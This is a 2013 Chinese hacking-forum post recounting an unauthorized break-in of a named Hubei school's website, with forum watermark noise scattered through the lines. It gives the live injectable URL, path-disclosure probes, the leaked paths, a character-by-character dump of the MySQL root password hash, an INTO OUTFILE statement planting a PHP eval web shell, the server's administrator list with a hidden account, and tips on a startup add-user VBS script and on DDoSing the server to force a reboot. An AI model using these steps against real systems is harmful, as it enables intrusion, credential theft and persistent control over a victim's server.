找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2493|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
6 E; M9 r7 D# K% W. o6 k  u8 m发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!" C: t! c- ]. p  G0 S4 }7 E! b
5 p9 j# a) A. g
3 p1 w1 x- M: O. w, W
) x% J% n4 [2 N& q  s
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , @6 |9 d1 y: r

- J# j+ y' r+ l1 ^% C那么想可以直接写入shell ,getshell有几个条件:8 @$ O$ i5 t) _+ y! z  m7 N
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
) x7 e7 g2 H# L( P! \0 _0 N$ |
/ t( u6 e! k' u8 h: V试着爆绝对路径:
8 k3 l7 X) h0 [: Q1./phpMyAdmin/index.php?lang[]=1  
+ w% m( ]4 d; s! g3 G2./phpMyAdmin/phpinfo.php  + F: T! S( J4 h% P) E$ D" ]
3./load_file()  " r+ A$ S% l' D5 |& `, C+ C7 E
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  - `9 d: ^; j2 m* T6 K  ^
5./phpmyadmin/libraries/select_lang.lib.php  - D/ g$ T9 x% s+ _2 Z
6./phpmyadmin/libraries/lect_lang.lib.php  4 i, K( n; q$ w* z, U
7./phpmyadmin/libraries/mcrypt.lib.php   
4 X/ B  v( V9 T" m1 ]- Y8 T! s8 N# p8./phpmyadmin/libraries/export/xls.php  8 _2 ~$ c7 B% x( S6 R

5 o/ p5 e9 \: j) D5 H, ?均不行...........................
: e, l" B0 f( G* k5 k+ W( s( X* Q( O" Q
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php5 R: P, Q' ?/ p# _( q7 z. p4 y: s

$ a( T+ g( K* a4 c! e" \4 S; b$ P权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
0 A! v, w: \" `# `* f4 W) Y8 V7 z5 Q' z. H! K
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
6 d, C7 p' I: i# I6 J# m2 g2 X: |5 m
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
$ ~; y. ?; e0 X7 v7 l+ X
8 J8 j$ F8 n  W% j7 q+ i想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" R7 V7 `) x& T& @9 Q# F, c5 f7 N- M3 |0 |9 H1 }: T  X5 e+ P
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 0 R9 c4 e4 a: Y* ~

, R2 v2 |) P1 X2 G2 Q0 ^7 g自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
$ V  ~7 Z  O: Q1 _$ ]2 p' z; L4 ^, `) |
成功读到root密码:. b9 d5 ^) a6 o$ b. W( @; K$ }

5 t9 y' k& _, S* y: r1 e! m# u17---- r(0072)' y3 Q* l$ Z+ h- k, y
18---- o(006f)) d% t) e9 c: j) A. o0 X( X
19---- o(006f)5 t+ e5 D# P5 K" X! k( l1 P* L; O
20---- t(0074)# r  b$ i5 ]: d, B
21---- *(002a)5 D+ T$ _2 J1 f2 k  t
22---- 8(0038)
6 M+ I( x+ W8 ], |23---- 2(0032)
; m* p  N4 ~/ ]1 o/ Y* ]24---- E(0045)
. h+ @, F/ ^  \9 C25---- 1(0031)3 R" }) E' ~" P5 C
26---- C(0043)
) R! H9 h) f+ ?/ ?27---- 5(0035)) e& _6 B+ U# V; p& m& a
28---- 8(0038)* M7 ^& O$ n& q3 @* x  l
29---- 2(0032)
% p; n4 o2 F! {6 l9 n6 f30---- 8(0038)( f+ J$ W0 I- z% Q
31---- A(0041)7 \2 K4 ^6 m3 A( R, }: Q$ K0 H; \: P
32---- 9(0039)7 t& K% i* \4 D+ ?5 x: ~4 B8 X* y
33---- B(0042)) y1 d( i* v" z+ i* t9 S: H& ~
34---- 5(0035): ?# M  G; S5 z: @5 q" H) e( R
35---- 4(0034)) J: h- s6 T# ~0 q7 N
36---- 8(0038)
- V- e: Z1 E& P0 e. I4 G37---- 6(0036)6 S0 z) W7 t/ U
38---- 4(0034)
3 ?- \  \" S8 e* E+ O- J8 g39---- 9(0039)
, }9 E) |4 w  j+ V7 `; E40---- 1(0031). _) p0 W" T9 S' Q
41---- 1(0031)5 o. b' Y2 `9 M" Z8 A' F4 z( b
42---- 5(0035)
8 A: R( Y$ }! W. W5 G43---- 3(0033)
; O- y, ?, W. |44---- 5(0035): b/ O3 n+ D4 F/ i
45---- 9(0039)/ |6 W! V0 {. U! O
46---- 8(0038)/ b) ~7 t. f4 P6 P2 `8 m* o- d( n8 n
47---- F(0046)
' Q$ P- u; B) z6 N48---- F(0046)6 c% _" z( ]9 L
49---- 4(0034)
/ u1 I2 X$ F5 _50---- F(0046)
0 d- [) J8 ~* r" i0 l; o51---- 0(0030)
4 U. s8 Z0 M- a3 G# U2 f- _52---- 3(0033)0 T* Y# e- i& n
53---- 2(0032)
6 \. C) O' C+ i, J! _' `54---- A(0041)# a, a6 i/ w" U6 m& E
55---- 4(0034)
" d0 B, v9 x5 h9 \1 O56---- A(0041)$ W; c7 K3 |  k
57---- B(0042)
" O4 o( c) X$ u0 M) ~58---- *(0044)
* E* h  X  t! ~. S5 @59---- *(0035)" I9 A! Y2 ?5 ^3 p8 c& k. z
60---- *(0041)
& X& W% _+ v' I; d: J8 A; V61---- *0032)
7 N: R9 g7 G* Q. D7 N" Z1 \$ t$ m( `+ S: ?7 h' w
解密后成功登陆phpmyamin
/ u+ u9 D$ O% C# J! r5 e                          8 l& p, ~6 m$ U# I' C! v* \
9 b$ ^+ l6 u3 d/ m& |
                             / R$ {: G$ X( M" `& e

! u2 K( e7 O1 S! S( a7 R找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'0 L# y( H1 a6 x* M

' O. r5 V# V6 F) Z" o' t- j! K1 _& H) Y成功执行,拿下shell,菜刀连接:0 s6 t& {7 k; H5 C* K
0 x8 f1 ~: y# C: w" W3 a0 I, h
服务器不支持asp,aspx,php提权无果...................
6 Q& ^# ?  @$ ^2 [2 T. B5 |. w) e: X; L
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
$ l7 Y/ p1 D/ P2 G% F1 O
服务器上已经有个隐藏帐号了

7 ~( E/ F' P% T6 J0 I5 z5 I' O
别名     administrators
" ?0 \6 s. w8 C7 U3 h/ j注释     管理员对计算机/域有不受限制的完全访问权
' j; l9 s" T  \0 L7 y4 z! I
成员
9 Z$ l% C6 k4 a: O! l( A7 I  T
-------------------------------------------------------------------------------0 P5 K% Z6 f# q* g$ u
admin! v$ R- G5 u5 q' J% Z. `& h6 {
Administrator
* ^' P9 `' x  A' C( Pslipper$
' p2 E1 j9 u2 r3 _* b5 F% e5 Psqluser1 C# Z& N+ [' a2 L) ^
命令成功完成。
& e* i5 F  ]# o% l3 R4 q4 f: M& }1 m* U" d
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。' T! P* B4 j+ C. d& o6 ]
9 {3 W- X# o! S. M8 w+ A
ddos服务器重启,不然就只能坐等服务器重启了...............................$ t$ w" Z( {; T9 N  e( _

+ Q+ A0 }6 W+ M      

; Q* G0 d- s" N; F

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表